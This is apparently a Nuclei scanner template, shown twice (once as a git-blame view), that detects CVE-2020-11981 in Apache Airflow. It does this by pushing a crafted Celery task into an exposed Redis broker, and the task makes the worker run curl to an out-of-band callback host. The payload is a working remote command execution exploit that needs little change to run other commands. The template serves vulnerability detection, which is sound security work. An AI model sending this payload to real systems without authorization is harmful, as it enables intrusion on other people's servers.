nuclei-templates/network/cves/2020/CVE-2020-11981.yaml

id: CVE-2020-11981

info:
  name: Apache Airflow <=1.10.10 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: Upgrade apache-airflow to version 1.10.11 or higher.
  reference:
    - https://github.com/apache/airflow/pull/9178
    - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11981
    cwe-id: CWE-78
    epss-score: 0.93693
  metadata:
    verified: true
    max-request: 2
    shodan-query: product:"redis"
  tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive
variables:
  data: "*3\r

    $5\r

    LPUSH\r

    $7\r

    default\r

    $936\r

    {\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
  encode1: '[[["curl", "http://'
  encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
  end: '"}'
tcp:
  - inputs:
      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r

          ')}}"
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:6379"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a00473045022006e488c4df33f02410a8ef6965c2e5029756058c181417f60c69d5025de65b79022100b2d4ec940c0b18f436c7f9dbaf76c529b16b2274d143956744460b26286397a6:922c64590222798bb761d5b6d8e72950
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`id: CVE-2020-11981`

			`info:`
lint fix 2023-05-16 18:09:07 +00:00			`name: Apache Airflow <=1.10.10 - Command Injection`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`author: pussycat0x`
			`severity: critical`
			`description: \|`
			`An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.`
			`remediation: Upgrade apache-airflow to version 1.10.11 or higher.`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`reference:`
Update CVE-2020-11981.yaml 2023-05-16 20:33:10 +00:00			`- https://github.com/apache/airflow/pull/9178`
minor -update 2023-05-17 13:16:14 +00:00			`- https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981`
Updated CVE-2020-11981 2023-05-29 11:32:09 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`cvss-score: 9.8`
Updated CVE-2020-11981 2023-05-29 11:32:09 +00:00			`cve-id: CVE-2020-11981`
			`cwe-id: CWE-78`
Added Impact 2023-09-27 15:51:13 +00:00			`epss-score: 0.93693`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`metadata:`
Added Impact 2023-09-27 15:51:13 +00:00			`verified: true`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`max-request: 2`
Update CVE-2020-11981.yaml 2023-05-16 20:33:10 +00:00			`shodan-query: product:"redis"`
updated tags 2023-07-31 15:39:04 +00:00			`tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`variables:`
Added Impact 2023-09-27 15:51:13 +00:00			`data: "*3\r`

			`$5\r`

			`LPUSH\r`

			`$7\r`

			`default\r`

			`$936\r`

			{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
minor -update 2023-05-17 13:16:14 +00:00			`encode1: '[[["curl", "http://'`
			`encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'`
Update CVE-2020-11981.yaml 2023-05-16 20:33:10 +00:00			`end: '"}'`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`tcp:`
			`- inputs:`
Added Impact 2023-09-27 15:51:13 +00:00			`- data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r`

			`')}}"`
lint fix 2023-05-16 18:09:07 +00:00			`read: 1024`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`host:`
			`- "{{Hostname}}"`
			`- "{{Host}}:6379"`

Fixed matchers-condition CVE-2020-11981 2023-06-13 08:52:29 +00:00			`matchers-condition: and`
CVE-2020-11981 2023-05-16 16:29:43 +00:00			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
Update CVE-2020-11981.yaml 2023-05-16 20:33:10 +00:00			`- "http"`
added additional matcher 2023-05-18 09:28:30 +00:00
			`- type: word`
			`part: interactsh_request`
			`words:`
			`- "User-Agent: curl"`
Auto Template Signing [Fri Dec 29 09:30:43 UTC 2023] :robot: 2023-12-29 09:30:44 +00:00			`# digest: 4a0a00473045022006e488c4df33f02410a8ef6965c2e5029756058c181417f60c69d5025de65b79022100b2d4ec940c0b18f436c7f9dbaf76c529b16b2274d143956744460b26286397a6:922c64590222798bb761d5b6d8e72950`